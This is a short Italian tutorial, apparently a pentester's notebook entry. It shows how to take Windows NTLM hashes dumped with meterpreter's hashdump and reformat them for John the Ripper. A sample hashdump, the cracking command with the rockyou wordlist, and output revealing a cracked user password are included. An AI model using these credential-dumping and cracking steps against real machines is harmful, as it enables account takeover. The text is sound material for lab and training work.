tags: hashdump NTLM johntheripper cracking password
Quando si entra in una macchina Windows e si installa il payload meterpreter si possono tramite il comando hashdump trovare le credenziali hashate dei vari utenti che si possono craccare tramite John The Ripper, ma per fare ciò è necessario formattare bene l’hash nel file hash.txt altrimenti John non riuscirà a craccarlo. Quindi in genere un file hashato di hashdump risulta così:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::Se ad esempio volessimo craccare l’utente Jon dovremmo creare una file .txt con all’interno solo questo:
Jon:ffb43f0de35be4d9917ac0cc8ad57f8dCioè il nome utente e il secondo hash presente hashato in NTLM.
Per craccarlo tramite John si può usare la seguente sintassi:
john --format=nt --wordlist=/opt/utili/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=16
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22 (Jon)
1g 0:00:00:00 DONE (2024-09-22 11:07) 2.439g/s 24878Kp/s 24878Kc/s 24878KC/s alr19882006..alpusidi
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed. Per avere maggiori informazioni sull’utilizzo di John andare alla seguente pagina John The Ripper